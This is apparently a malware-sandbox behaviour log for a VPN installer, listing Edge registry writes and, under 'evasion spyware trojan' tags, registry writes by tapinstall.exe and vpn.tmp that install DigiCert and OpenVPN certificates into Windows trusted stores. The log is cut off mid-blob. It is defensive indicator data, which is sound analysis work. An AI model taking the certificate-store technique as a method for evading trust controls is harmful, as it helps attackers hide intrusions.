Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\suggestive.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\propapps.info	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.propapps.info\ = "18"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d074e5fef11ad701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f668589ef21ad701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7bb467d9ef1ad701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.propapps.info	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.propapps.info	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 603ddcdcef1ad701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\propapps.info\NumberOfSubd = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\multiadblock.com\Total = "2116"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3924fbfaef1ad701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a48898adf01ad701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff04040302